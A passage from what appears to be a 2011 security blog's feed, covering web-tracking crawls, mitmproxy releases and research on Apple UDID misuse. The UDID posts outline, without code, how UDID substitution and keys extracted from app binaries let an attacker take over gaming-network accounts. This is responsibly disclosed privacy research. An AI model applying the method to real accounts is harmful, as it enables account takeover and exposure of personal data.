At the moment, Netograph scans\n<a rel=\"external\" href=\"http:\/\/reddit.com\">Reddit<\/a>, <a rel=\"external\" href=\"http:\/\/news.ycombinator.com\">Hacker News<\/a>,\n<a rel=\"external\" href=\"http:\/\/pinboard.in\">Pinboard<\/a>, <a rel=\"external\" href=\"http:\/\/delicious.com\">Delicious<\/a> and\n<a rel=\"external\" href=\"http:\/\/digg.com\">Digg<\/a> - links on these sites should show up within a few\nminutes of submission.<\/p>\n<p>For more details, head over to <a rel=\"external\" href=\"http:\/\/netograph.com\">netograph.com<\/a>. There you\nwill also find\n<a rel=\"external\" href=\"https:\/\/addons.mozilla.org\/en-US\/firefox\/addon\/netograph\/\">Firefox<\/a> and\n<a rel=\"external\" href=\"https:\/\/chrome.google.com\/webstore\/detail\/bfhmbldbigkpniinkmckafbgcajcbaai\">Chrome<\/a>\nbrowser addons that let you view the Netograph report for a URL instantly with a\nright-click. Enjoy!<\/p>\n<div class=\"container\">\n    <div class=\"row\">\n        <div class=\"column\">\n            <a href=\"http:\/\/netograph.com\/starmap\/1740\">\n                <img src=\"ng-guardian.png\">\n                guardian.co.uk\n            <\/a>\n        <\/div>\n        <div class=\"column\">\n            <a href=\"http:\/\/netograph.com\/starmap\/2512\">\n                <img src=\"ng-techcrunch.png\">\n                techcrunch.com\n            <\/a>\n        <\/div>\n        <div class=\"column\">\n            <a href=\"http:\/\/netograph.com\/starmap\/2457\">\n                <img src=\"ng-reddit.png\">\n                reddit.com\n            <\/a>\n        <\/div>\n    <\/div>\n<\/div>\n<h2 id=\"what-s-next\">What's next?<\/h2>\n<p>This is just the first step. As I hinted in a <a href=\"https:\/\/corte.si\/posts\/privacy\/neighbourhoods-of-trust\/\">previous\npost<\/a>, the most interesting\nresults from Netograph are likely to come from aggregating and\ncross-correlating the data for individual URLs. 
I'm already hard at work on\nthis - the next iteration of Netograph will aim to shine some light on the\nsometimes shadowy network of third-parties that track and analyze nearly every\nURL we visit. I will also be publishing some interesting tidbits from this data\ncorpus on my blog as I go along, so watch this space.<\/p>\n"},{"title":"Otago Polytechnic Talk","published":"2011-10-31T00:00:00+00:00","updated":"2011-10-31T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/talks\/polytech\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/talks\/polytech\/","content":"<p>Further reading for the guest lecture I'm giving at Otago Polytechnic today:<\/p>\n<ul>\n<li>The talk I'm not giving: <a rel=\"external\" href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2010-Main\">OWASP Top\n10<\/a><\/li>\n<li>Tools: <a rel=\"external\" href=\"http:\/\/getfirebug.com\/\">FireBug<\/a>,\n<a rel=\"external\" href=\"https:\/\/addons.mozilla.org\/en-US\/firefox\/addon\/tamper-data\/\">TamperData<\/a>,\n<a rel=\"external\" href=\"http:\/\/python.org\">Python<\/a>.<\/li>\n<li>The <a href=\"http:\/\/en.wikipedia.org\/wiki\/Samy_(XSS)\">Myspace Worm<\/a>, and\nSamy Kamkar's <a rel=\"external\" href=\"http:\/\/namb.la\/popular\/tech.html\">own explanation of the\nexploit<\/a>.<\/li>\n<li>Halvar Flake's <a rel=\"external\" href=\"http:\/\/www.immunityinc.com\/infiltrate\/2011\/presentations\/Fundamentals_of_exploitation_revisited.pdf\">Programming and state\nmachines<\/a>,\nwhich is where I first saw the term \"programming the weird machine\".<\/li>\n<\/ul>\n"},{"title":"Neighborhoods of trust on the web","published":"2011-09-27T00:00:00+00:00","updated":"2011-09-27T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/privacy\/neighbourhoods-of-trust\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/privacy\/neighbourhoods-of-trust\/","content":"<p>For the last fortnight I've been hard at work on a new project that aims to\nexamine 
trust and security on the web at scale. The basic idea is to use a\nbrowser instance to render a URL, and then to extract all persistent state with\nbrowser forensic techniques afterwards. This gives you a dump of cookies, cache\ncontents, Flash storage, HTML5 databases, and so on. At the same time, all\ntraffic is routed through a specialised version of\n<a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a>, and captured for later analysis. The result\nis a very detailed snapshot of what viewing a given URL actually <em>does<\/em>. The\nnext step is to do this \"at scale\" - this means running many instances of this\nprocess in parallel on headless servers, decoupling things using queues, backing\nit all onto a database, and then spending days and days fine-tuning. I'm happy\nwith my progress so far - my infrastructure is now scanning all the URLs\npassing through <a rel=\"external\" href=\"http:\/\/news.ycombinator.com\">Hacker News<\/a>,\n<a rel=\"external\" href=\"http:\/\/reddit.com\">Reddit<\/a>, <a rel=\"external\" href=\"http:\/\/digg.com\">Digg<\/a>,\n<a rel=\"external\" href=\"http:\/\/delicious.com\">Delicious<\/a> and <a rel=\"external\" href=\"http:\/\/pinboard.in\">Pinboard<\/a> in\nrealtime, without breaking a sweat.<\/p>\n<p>I am pretty excited about the possibilities for this project, and I'm exploring\nplans for the future with like-minded security folk. Get in touch if this\ninterests you, and keep an eye on my blog for more news.<\/p>\n<p>After my pilot run, I had 150 gigs of data covering about 120 thousand URLs.\nBelow is a quick peek at one tiny slice of this data - an appetizer for things\nto come.<\/p>\n<h2 id=\"neighborhoods-of-trust\">Neighborhoods of trust<\/h2>\n<div class=\"media\">\n    <a href=\"full.png\">\n        <img src=\"wholegraph.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>This graph shows structures that emerge from the way sites use third-party\nexecutable resources. 
In this context, \"executable\" means JavaScript,\nFlash and HTML, and \"third-party\" means domains other than the URL's own. The\nnodes in this graph are the third-party domains, and the edges are associations\nbetween them via the URLs I crawled. For example, if a site loaded scripts from\nboth Google Analytics and from Doubleclick, that would create (or reinforce) an\nedge between the nodes \"google-analytics.com\" and \"doubleclick.net\".  Using\nthis data, I calculated a co-occurrence coefficient for the third-party\nsources, and then extracted the resulting neighbourhood structures\n<a rel=\"external\" href=\"http:\/\/lanl.arxiv.org\/abs\/0803.0476\">algorithmically<\/a>. The neighbourhood\ninformation was used to colour and lay out the graph, trying to keep nodes that\nare closely correlated together. Finally, nodes are scaled based on how many\nURLs reference them.<\/p>\n<p>The result is a rather stunning graph showing neighborhoods of trust - areas of\nthe Internet bound together based on the third parties allowed to run code in\nusers' browsers. I've spent a few hours playing with this data, and the sheer\nrange of interesting structure is surprising. At one end of the spectrum, you\ncan zoom in to the individual node relationships, and find small clusters of\nsurprising sites that cross-load resources from each other, often because they\nare owned by the same entity. At the other end, countries, language groups, and\nbroad fields of interest aggregate in huge tribes of kinship.<\/p>\n<p>Here are a few of the larger-scale features from the graph.<\/p>\n<h3 id=\"mainstream\">Mainstream<\/h3>\n<div class=\"media\">\n    <a href=\"wholegraph-b.png\">\n        <img src=\"wholegraph-b.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>The most widely used resources dominate in the neighbourhood\nextraction algorithm, which causes them to cluster together in\ntheir own super-community. 
The top nodes in this cluster, in\ndescending order of occurrence, are: google-analytics.com,\nfacebook.com, doubleclick.net, fbcdn.net, quantserve.com,\ntwitter.com, google.com, googlesyndication.com, googleapis.com,\nscorecardresearch.net, facebook.net, addthis.com. These are\nalso the top nodes overall.<\/p>\n<h3 id=\"japanese\">Japanese<\/h3>\n<div class=\"media\">\n    <a href=\"wholegraph-a.png\">\n        <img src=\"wholegraph-a.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>The main resources are hatena.ne.jp, microad.jp, mixi.jp,\nyahoo.co.jp, nakanohito.jp. More surprisingly, also in this cluster\nare topsy.com, appspot.com and postrank.com. Perhaps these\nresources are especially commonly used on Japanese sites.<\/p>\n<h3 id=\"russian\">Russian<\/h3>\n<div class=\"media\">\n    <a href=\"wholegraph-d.png\">\n        <img src=\"wholegraph-d.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Top resources are yadro.ru, yandex.ru, rambler.ru, vkontakte.ru,\nopenstat.net, userapi.com, shinystat.net, and dt00.net.<\/p>\n<h3 id=\"porn\">Porn<\/h3>\n<div class=\"media\">\n    <a href=\"wholegraph-c.png\">\n        <img src=\"wholegraph-c.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>And here we have a portion of the web dedicated to porn. The top\nresources are awempire.com, clickbank.net, picadmedia.com,\ngetresponse.com, adultfriendfinder.com, adultadword.com, phcdn.com,\njuicyads.com, brazzers.com, etology.com, data-ero-advertising.com\nand viddler.com. A more surprising inclusion in this group is\nwufoo.com - I wonder if this is an artifact, or whether Wufoo\nreally does have a use in the adult content world.<\/p>\n<h3 id=\"misc\">Misc<\/h3>\n<div class=\"media\">\n    <a href=\"wholegraph-e.png\">\n        <img src=\"wholegraph-e.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Just to show that it's not all clear-cut, here's an example of a\nneighbourhood I find harder to explain. 
The top resources are\nnetdna-cdn.com, amgdgt.com, trafficmp.com, ooyala.com,\nsuitesmart.com, demdex.net, adfrontiers.com, lycos.com and\nbreak.com. I speculate that this group might be loosely aligned\naround a number of big CDNs and analysis suites.<\/p>\n<h2 id=\"tech\">Tech<\/h2>\n<p>The graph in this post was created, analyzed and pre-processed using\n<a rel=\"external\" href=\"http:\/\/projects.skewed.de\/graph-tool\/\">graph-tool<\/a>, a great Python library for\ndealing with large graphs. The visualization and modularity analysis were done\nusing the ever-wonderful <a rel=\"external\" href=\"http:\/\/gephi.org\/\">Gephi<\/a>. If these aren't both in\nyour arsenal of analysis tools, you're missing out.<\/p>\n"},{"title":"Why the Apple UDID had to die","published":"2011-09-09T00:00:00+00:00","updated":"2011-09-09T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/udid-must-die\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/udid-must-die\/","content":"<p><strong>EDIT: A <a rel=\"external\" href=\"http:\/\/blogs.wsj.com\/digits\/2011\/09\/19\/privacy-risk-found-on-cellphone-games\/\">WSJ Digits\narticle<\/a>\nis now up, containing responses from Zynga and Chillingo. Other networks\ndeclined to comment.<\/strong><\/p>\n<p>A UDID is a \"Unique Device Identifier\" - you can think of it as a serial number\nburned permanently into every iPhone, iPad and iPod Touch. Any installed app can\naccess the UDID without requiring the user's knowledge or consent.  We know that\nUDIDs are very widely used - in a sample of 94 apps I tested, <a href=\"https:\/\/corte.si\/posts\/security\/apple-udid-survey\/\">74% silently sent\nthe UDID to one or more servers on the\nInternet<\/a>, often without\nencryption. This means that UDIDs are not secret values - if you use an Apple\ndevice regularly, it's certain that your UDID has found its way into scores of\ndatabases you're entirely unaware of. 
Developers often assume UDIDs are\nanonymous values, and routinely use them to aggregate detailed and sensitive\nuser behavioural information. One example is Flurry, a mobile analytics firm\nused by 15% of apps I tested, which can monitor application startup, shutdown,\nscores achieved, and a host of other application-specific events, all linked to\nthe user's UDID. I recently showed that it was possible to use\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/OpenFeint\">OpenFeint<\/a>, a large mobile social\ngaming network, to <a href=\"https:\/\/corte.si\/posts\/security\/openfeint-udid-deanonymization\/\">de-anonymize\nUDIDs<\/a>, linking them\nto usernames, email addresses, GPS locations, and even Facebook profiles.<\/p>\n<p>This post looks at the way UDIDs are used in the broader social gaming\necosystem. The work is based on a simple question: what happens if we swap our\nUDID for another while communicating with the network?  There are a number of\nways to do this - in my case I used <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a>, an\nintercepting HTTP\/S proxy I developed which lets me re-write the traffic leaving\na device on the fly. In most cases this was a simple matter of replacing one\nstring with another, but two networks (Scoreloop and Crystal) prevented UDID\nsubstitution using cryptography. Unfortunately, both networks relied on the\nsecrecy of key material distributed in the application binaries to every device.\nI have verified that it is possible to reverse engineer the application binaries\nto extract the key material and circumvent the cryptographic protection.<\/p>\n<p>The outcome of this experiment shows that social gaming networks systematically\nmisuse UDIDs, resulting in serious privacy breaches for their users. All the\nnetworks I tested allowed UDIDs to be linked to potentially identifying user\ninformation, ranging from usernames to email addresses, friends lists and\nprivate messages. 
Furthermore, 5 of the 7 networks allow an attacker to log in\nas a user using only their UDID, giving the attacker complete control of the\nuser's account. Two networks had further problems that compromised a user's\nFacebook and Twitter accounts - Crystal lets an attacker take control of a user's\naccounts by leaking API keys, while Scoreloop partially discloses users' friends\nlists, even if they are private.<\/p>\n<style>\n    .yes {\n        background-color: #d55858;\n        color: #000000;\n    }\n    .no {\n        background-color: #5bd65b;\n        color: #000000;\n    }\n\n<\/style>\n<table>\n    <tr>\n        <th><\/th>\n        <th>Data leaked<\/th>\n        <th>Login as user<\/th>\n        <th>Social Media Accounts<\/th>\n    <\/tr>\n    <tr>\n        <th><a href=\"http:\/\/www.chillingo.com\/\">Crystal<\/a><\/th>\n        <td class=\"yes\"> Username, friends, Facebook, Twitter, games played, location, email address <\/td>\n        <td class=\"yes\"> Yes <\/td>\n        <td class=\"yes\"> Control of Facebook, Twitter accounts<\/td>\n    <\/tr>\n    <tr>\n        <th><a href=\"http:\/\/www.gameloft.com\/\">GameLoft<\/a><\/th>\n        <td class=\"yes\"> Username, email address, games played, nationality, friends <\/td>\n        <td class=\"yes\"> Yes <\/td>\n        <td class=\"no\"> No <\/td>\n    <\/tr>\n    <tr>\n        <th><a href=\"http:\/\/www.geocade.com\/\">Geocade<\/a><\/th>\n        <td class=\"yes\"> Username, email address, games played, location <\/td>\n        <td class=\"yes\"> Yes <\/td>\n        <td class=\"no\"> No <\/td>\n    <\/tr>\n    <tr>\n        <th><a href=\"http:\/\/openfeint.com\/\">OpenFeint<\/a><\/th>\n        <td class=\"yes\"> Username, last played game, online status, friends <\/td>\n        <td class=\"yes\"> Yes <\/td>\n        <td class=\"no\"> No <\/td>\n    <\/tr>\n    <tr>\n        <th><a href=\"http:\/\/www.scoreloop.com\/\">Scoreloop<\/a><\/th>\n        <td class=\"yes\"> Email address, gender, username, 
nationality, friends <\/td>\n        <td class=\"yes\"> Yes <\/td>\n        <td class=\"yes\"> Access private Facebook and Twitter friends lists <\/td>\n    <\/tr>\n    <tr>\n        <th><a href=\"http:\/\/plusplus.com\/\">Plus+<\/a><\/th>\n        <td class=\"yes\"> Username <\/td>\n        <td class=\"no\"> No <\/td>\n        <td class=\"no\"> No <\/td>\n    <\/tr>\n    <tr>\n        <th><a href=\"http:\/\/www.zynga.com\/\">Zynga<\/a><\/th>\n        <td class=\"yes\"> First name, username, friends*, in-game messages*,\n        mobile number*<\/td>\n        <td class=\"yes\"> Yes* <\/td>\n        <td class=\"no\"> No <\/td>\n    <\/tr>\n<\/table>\n<p>* The starred Zynga findings rely on the fact that other networks can be used\nto obtain the user's email address using the UDID.<\/p>\n<p>There are two caveats to keep in mind while considering these results. First,\nthe findings are based on the default settings for each social network - some\nnetworks may have settings that reduce the amount of information exposed.\nSecond, some of the data leaked is optional - for instance, it's not mandatory\nfor a user to link Facebook or Twitter accounts with any of the networks.<\/p>\n<p>All the affected companies and Apple were notified 5 weeks ago. The Crystal and\nScoreloop teams have both repaired the problems that could lead to a follow-on\ncompromise of a user's social network accounts. At the time of writing, it is\nstill possible to log in as a user using only a UDID on five of the vulnerable\nnetworks.<\/p>\n<h2 id=\"the-future\">The future<\/h2>\n<p>A few days after I notified the companies involved, it was revealed that Apple\nwas <a rel=\"external\" href=\"http:\/\/techcrunch.com\/2011\/08\/19\/apple-ios-5-phasing-out-udid\/\">quietly killing the UDID\nAPI<\/a>. It will\nstill be present in iOS 5, but is marked deprecated, and will probably be\nremoved in future. 
I recommend that developers shift away from using UDIDs now,\nrather than wait for formal removal of the API.<\/p>\n<p>We can now expect a frenzy of activity as developers look for alternatives. The\nchallenge will be to make sure that the cure isn't as bad as the disease -\nApple's recommendation to \"create a unique identifier specific to your app\"\ncould tempt developers to replicate the UDID mechanism on a smaller scale,\nflaws and all. Expect more blog posts on this topic soon.<\/p>\n"},{"title":"mitmproxy 0.6","published":"2011-08-07T00:00:00+00:00","updated":"2011-08-07T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_6\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_6\/","content":"<div class=\"media\">\n    <a href=\"..&#x2F;mitmproxy_0_4.png\">\n        <img src=\"..&#x2F;mitmproxy_0_4.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I'm happy to announce the release of mitmproxy 0.6, featuring a redesigned\nscripting API, a slew of major new features and a panoply of small bugfixes and\nimprovements.<\/p>\n<h2 id=\"changelog\">Changelog<\/h2>\n<ul>\n<li>New scripting API that allows much more flexible and fine-grained\nrewriting of traffic. See the docs for more info.<\/li>\n<li>Support for gzip and deflate content encodings. 
A new \"z\"\nkeybinding in mitmproxy to let us quickly encode and decode content, plus\nautomatic decoding for the \"pretty\" view mode.<\/li>\n<li>An event log, viewable with the \"v\" shortcut in mitmproxy, and the \"-e\"\ncommandline argument in both mitmproxy and mitmdump.<\/li>\n<li>Huge performance improvements both in the mitmproxy interface, and loading\nlarge numbers of flows from file.<\/li>\n<li>A new \"replace\" convenience method for all flow objects, that does a\nuniversal regex-based string replacement.<\/li>\n<li>Header management has been rewritten to maintain both case and order.<\/li>\n<li>Improved stability for SSL interception.<\/li>\n<li>Default expiry time on generated SSL certs has been dropped to avoid an\nOpenSSL overflow bug that caused certificates to expire in the distant\npast on some systems.<\/li>\n<li>A \"pretty\" view mode for JSON and form submission data.<\/li>\n<li>Expanded documentation and examples.<\/li>\n<li>Many other small improvements and bugfixes.<\/li>\n<\/ul>\n"},{"title":"mitmproxy 0.5","published":"2011-06-27T00:00:00+00:00","updated":"2011-06-27T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_5\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_5\/","content":"<div class=\"media\">\n    <a href=\"..&#x2F;mitmproxy_0_4.png\">\n        <img src=\"..&#x2F;mitmproxy_0_4.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I've just tagged and released mitmproxy 0.5. Everyone should update - this\nrelease squelches a few annoying performance killers. You can download it from\nthe project website:<\/p>\n<h2 id=\"mitmproxy-org\"><a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy.org<\/a><\/h2>\n<h2 id=\"changelog\">Changelog<\/h2>\n<ul>\n<li>An -n option to start the tools without binding to a proxy port.<\/li>\n<li>Allow scripts, hooks, sticky cookies etc. 
to run on flows loaded from\nsave files.<\/li>\n<li>Regularize command-line options for mitmproxy and mitmdump.<\/li>\n<li>Add an \"SSL exception\" to mitmproxy's license to remove possible\ndistribution issues.<\/li>\n<li>Add a --cert-wait-time option to make mitmproxy pause after a new SSL\ncertificate is generated. This can pave over small discrepancies in\nsystem time between the client and server.<\/li>\n<li>Handle viewing big request and response bodies more elegantly. Only\nrender the first 100k of large documents, and try to avoid running the\nXML indenter on non-XML data.<\/li>\n<li><strong>BUGFIX<\/strong>: Make the \"revert\" keyboard shortcut in mitmproxy work after a\nflow has been replayed.<\/li>\n<li><strong>BUGFIX<\/strong>: Repair a problem that sometimes caused SSL connections to consume\n100% of CPU.<\/li>\n<\/ul>\n"},{"title":"UDID media roundup","published":"2011-06-10T00:00:00+00:00","updated":"2011-06-10T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/udid-media-roundup\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/udid-media-roundup\/","content":"<p>After a hectic month, I'm finally able to return to the UDID privacy issues I\ncovered in my last few blog posts. 
I plan to publish some further results soon,\nbut first, a quick roundup of the media coverage of the <a href=\"https:\/\/corte.si\/posts\/security\/openfeint-udid-deanonymization\/\">OpenFeint UDID\nde-anonymization\nresult<\/a>.<\/p>\n<ul>\n<li><a rel=\"external\" href=\"http:\/\/blogs.wsj.com\/digits\/2011\/05\/11\/the-privacy-risks-of-id-codes-in-your-apps\/\">A post on the Wall Street Journal tech\nblog<\/a>\nby <a rel=\"external\" href=\"http:\/\/www.jennifervalentinodevries.com\/\">Jennifer Valentino-DeVries<\/a>, one\nof the very few journalists who do good, novel investigative work into issues\nlike UDID privacy.<\/li>\n<li>An interview with <a rel=\"external\" href=\"http:\/\/www.repubblica.it\/tecnologia\/2011\/06\/03\/news\/identificativo_iphone-17073898\/\">La\nRepubblica<\/a>,\na major Italian daily.<\/li>\n<li>An article in <a rel=\"external\" href=\"http:\/\/www.spiegel.de\/netzwelt\/gadgets\/0,1518,761735,00.html\">Der Spiegel<\/a>.<\/li>\n<li>Coverage on <a rel=\"external\" href=\"http:\/\/articles.cnn.com\/2011-05-09\/tech\/identity.iphones.ipads_1_apps-identifier-privacy?_s=PM:TECH\">CNN\nonline<\/a>,\n<a rel=\"external\" href=\"http:\/\/www.wired.com\/gadgetlab\/2011\/05\/iphone-udid\/\">Wired Gadgetlab<\/a> and the\n<a rel=\"external\" href=\"http:\/\/www.huffingtonpost.com\/2011\/05\/10\/iphone-udid-personal-information-identity_n_860139.html\">Huffington\nPost<\/a>.<\/li>\n<li>And, last but not least, a <a rel=\"external\" href=\"http:\/\/netsecpodcast.com\/?p=772\">nice 30-minute\ninterview<\/a> with <a rel=\"external\" href=\"https:\/\/twitter.com\/#!\/quine\">Zach\nLanier<\/a> from the <a rel=\"external\" href=\"http:\/\/netsecpodcast.com\/\">Network Security\nPodcast<\/a>. 
This is your opportunity to get some more\ndetails on the OpenFeint issue and find out what a weird accent I have.<\/li>\n<\/ul>\n<p>The issue was also mentioned on many, many blogs and smaller publications.<\/p>\n"},{"title":"How UDIDs are used: a survey","published":"2011-05-19T00:00:00+00:00","updated":"2011-05-19T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/apple-udid-survey\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/apple-udid-survey\/","content":"<p>I recently published some\n<a href=\"https:\/\/corte.si\/posts\/security\/openfeint-udid-deanonymization\/\">research<\/a> showing\nthat the OpenFeint social gaming network can be used to link Apple UDIDs to\nusers' real-world identities. To understand why this is a problem, we have to\nlook at the way UDIDs are used in the broader app ecosystem. Once we do this, we\nsee that the vast majority of applications send UDIDs to servers on the\nInternet, and that UDID-linked user information is aggregated in literally\nthousands of databases on the net. In this context, UDID de-anonymization is a\nserious threat to user privacy.<\/p>\n<p>We have one good research paper surveying UDID use - in 2010, Eric Smith <a rel=\"external\" href=\"http:\/\/www.pskl.us\/wp\/?p=476\">looked\nat the unencrypted portion of app traffic<\/a>, and\nfound that 68% of tested apps send UDIDs upstream in the clear. I was curious to\nsee what the figures would look like if encrypted (HTTPS) traffic was included,\nso I decided to do my own survey, using <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a> to\nanalyse all traffic from the 94 applications I had installed on my iPhone. Below\nis a set of graphs highlighting the main facts. 
I've also published a list of\nall applications and the domains they contacted <a href=\"https:\/\/corte.si\/posts\/security\/apple-udid-survey\/appdomains.html\">here<\/a> - it\nmakes for interesting reading.<\/p>\n<h2 id=\"apps-are-noisier-than-you-think-they-are\">Apps are noisier than you think they are<\/h2>\n<div class=\"media\">\n    <a href=\"all_domains.png\">\n        <img src=\"all_domains.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>84% of apps tested contacted one or more domains during use. At the extreme end,\n<a rel=\"external\" href=\"http:\/\/itunes.apple.com\/us\/app\/idestroy-wicked-sick-stress\/id309689677?mt=8\">iDestroy<\/a>\ncontacted 14 domains, including 3 different ad networks and OpenFeint.<\/p>\n<h2 id=\"and-send-your-udid-to-more-places-than-you-expect\">... and send your UDID to more places than you expect<\/h2>\n<div class=\"media\">\n    <a href=\"udid_domains.png\">\n        <img src=\"udid_domains.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>74% of apps tested sent the device UDID  to one or more domains.<\/p>\n<h2 id=\"often-without-encryption\">... often without encryption<\/h2>\n<div class=\"media\">\n    <a href=\"udid_scheme.png\">\n        <img src=\"udid_scheme.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>46% of apps that transmitted UDIDs did so in the clear. 54% of apps\ntransmitting UDIDs used encryption for all UDID traffic<sup class=\"footnote-reference\"><a href=\"#1\">1<\/a><\/sup>.<\/p>\n<h2 id=\"a-few-big-udid-aggregators-dominate\">A few big UDID aggregators dominate<\/h2>\n<div class=\"media\">\n    <a href=\"topdomains.png\">\n        <img src=\"topdomains.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Three big aggregators of UDID-related data dominate: <a rel=\"external\" href=\"http:\/\/apple.com\">Apple<\/a>,\n<a rel=\"external\" href=\"http:\/\/www.flurry.com\">Flurry<\/a>, and <a rel=\"external\" href=\"http:\/\/www.openfeint.com\">OpenFeint<\/a>. 
Each\none of these companies has the vast majority of UDIDs on file, linked to a rich\nset of privacy-sensitive information. OpenFeint's ubiquity is one of the reasons\nwhy UDID de-anonymization using their API is so serious.<\/p>\n<h2 id=\"behind-them-are-a-long-tail-of-smaller-aggregators\">...  behind them is a long tail of smaller aggregators<\/h2>\n<p>Here is a list of all the remaining domains that had UDIDs transmitted to them - a\nmixture of ad networks, analytics firms, individual developer sites, and\nonline services.<\/p>\n<table>\n<tr>\n<td> ads.mp.mydas.mobi <\/td>\n<td> analytics.localytics.com <\/td>\n<td> api.dropbox.com <\/td>\n<\/tr>\n<tr>\n<td> bayobongo.com <\/td>\n<td> bbc.112.2o7.net <\/td>\n<td> beatwave.collect3.com.au <\/td>\n<\/tr>\n<tr>\n<td> catalog.lexcycle.com <\/td>\n<td> data.mobclix.com <\/td>\n<td> init.gc.apple.com <\/td>\n<\/tr>\n<tr>\n<td> msh.amazon.com <\/td>\n<td> notifications.lexcycle.com <\/td>\n<td> promo.limbic.com <\/td>\n<\/tr>\n<tr>\n<td> soma.smaato.com <\/td>\n<td> www.chimerasw.com <\/td>\n<td> www.phasiclabs.com <\/td>\n<\/tr>\n<tr>\n<td> www.trainyard.ca <\/td>\n<td> api.twitter.com <\/td>\n<td> ngpipes.ngmoco.com <\/td>\n<\/tr>\n<tr>\n<td> npr.122.2o7.net <\/td>\n<td> ws.tapjoyads.com <\/td>\n<td>  <\/td>\n<\/tr>\n<\/table>\n<h2 id=\"methodology\">Methodology<\/h2>\n<p>For each application, I started a logging instance of mitmdump, like so:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">mitmdump<\/span><span style=\"color: #005CC5;\"> -w<\/span><span style=\"color: #032F62;\"> appname<\/span><\/span><\/code><\/pre>\n<p>I then started up the application, interacted with anything that might elicit\nnetwork traffic, and shut it down. 
The collected data was analyzed with a simple\nscript that used the <a rel=\"external\" href=\"http:\/\/mitmproxy.org\/doc\/library.html\">libmproxy<\/a> API to\ntraverse the traffic dumps and extract the needed information.<\/p>\n<div class=\"footnote-definition\" id=\"1\"><sup class=\"footnote-definition-label\">1<\/sup>\n<p>The fact that 54% of UDID-using apps encrypted all of their UDID traffic, and\nso would have gone undetected by Smith's study, seems to indicate that there\nshould be a much greater difference between our results - Smith found 68% of\napps use UDIDs vs my 74%. The\ndiscrepancy can be accounted for by the fact that we used different samples -\nSmith used predominantly applications in Apple's \"Top Free\" lists, whereas I\nused both paid and unpaid applications that happened to be on my phone.<\/p>\n<\/div>\n"},{"title":"De-anonymizing Apple UDIDs with OpenFeint","published":"2011-05-04T00:00:00+00:00","updated":"2011-05-04T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/openfeint-udid-deanonymization\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/openfeint-udid-deanonymization\/","content":"<p>Every iPhone, iPad and iPod touch has an associated Unique Device Identifier\n(UDID). You can think of the UDID as a serial number burned into the device -\none that can't be removed or changed<sup class=\"footnote-reference\"><a href=\"#1\">1<\/a><\/sup>. This number is exposed to app\ndevelopers through an API, without requiring the device owner's permission or\nknowledge.<\/p>\n<p>Few Apple users realise just how widely their UDIDs are used. <a rel=\"external\" href=\"http:\/\/www.pskl.us\/wp\/?p=476\">Research\nshows<\/a> that 68% of apps silently send UDIDs to\nservers on the Internet. This is often accompanied by information on how, when\nand where the device is used.  
The most common destination for traffic\ncontaining a user's UDID is Apple itself, followed by the\n<a rel=\"external\" href=\"http:\/\/www.flurry.com\/\">Flurry<\/a> mobile analytics network and OpenFeint, a\nmobile social gaming company. These companies are uber-aggregators of\nUDID-linked user information, because so many apps use their APIs. Trailing\nbehind the big three are thousands of individual developer sites, ad servers and\nsmaller analytics firms. Users have no way to stop their device from offering up\nits UDID, to tell who their data is being sent to, or even to tell that it's\nhappening at all. This situation has caused widespread concern, including\ncoverage in the <a rel=\"external\" href=\"http:\/\/blogs.wsj.com\/digits\/2010\/12\/19\/unique-phone-id-numbers-explained\/\">Wall Street\nJournal<\/a>,\nand <a rel=\"external\" href=\"http:\/\/www.txinjuryblog.com\/tags\/udid-lawsuit\/\">two<\/a>\n<a rel=\"external\" href=\"http:\/\/www.infosecurity-us.com\/view\/15643\/apple-faces-second-lawsuit-over-udid-disclosure-to-third-parties\/\">lawsuits<\/a>\naimed at Apple.<\/p>\n<p>The saving grace is that your device UDID is not linked to your real-world\nidentity. If it were possible to de-anonymize UDIDs, the result would be a\nserious privacy breach. Apple is well aware of this, and <a rel=\"external\" href=\"http:\/\/developer.apple.com\/library\/ios\/#documentation\/uikit\/reference\/UIDevice_Class\/Reference\/UIDevice.html\">explicitly tells\ndevelopers that they are not permitted to publicly link a UDID to a user\naccount<\/a>.<\/p>\n<p>I recently published a tool called <a rel=\"external\" 